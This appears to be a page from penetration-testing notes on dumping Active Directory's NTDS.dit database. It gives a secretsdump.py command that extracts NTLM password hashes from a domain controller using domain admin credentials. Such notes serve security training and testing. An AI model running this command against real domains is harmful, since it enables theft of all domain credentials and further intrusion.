Dumping the NTDS.dit

The NTDS.dit is a database that stores AD data

Secretsdump.py

We can use secretsdump.py to dump the NTDS.dit if we have DA credentials

$ secretsdump.py [domain]/[username]:'[password]'@[dc-ip] -just-dc-ntlm
PreviousGPP/cPassword AttacksNextGolden Ticket Attacks

Last updated